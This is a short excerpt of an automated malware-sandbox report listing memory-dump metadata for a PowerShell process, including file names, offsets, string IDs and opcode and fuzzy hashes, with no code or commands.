                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                      • API String ID: 0-2049395529
                                                      • Opcode ID: 8d9a22f46c986746ce65dda67eb02b7b8d1bbd77a9e8f73d247e09e1f52f2ddf
                                                      • Instruction ID: 09ee830236a53d14dbf25c06cb4905cc0eb5b3134f97d29138b2f4ca667b2fa9
                                                      • Opcode Fuzzy Hash: 8d9a22f46c986746ce65dda67eb02b7b8d1bbd77a9e8f73d247e09e1f52f2ddf
                                                      • Instruction Fuzzy Hash: DA01F7A0B093954FC72B167A18281566F765FC361071945ABC082CF39BED658C8A87A3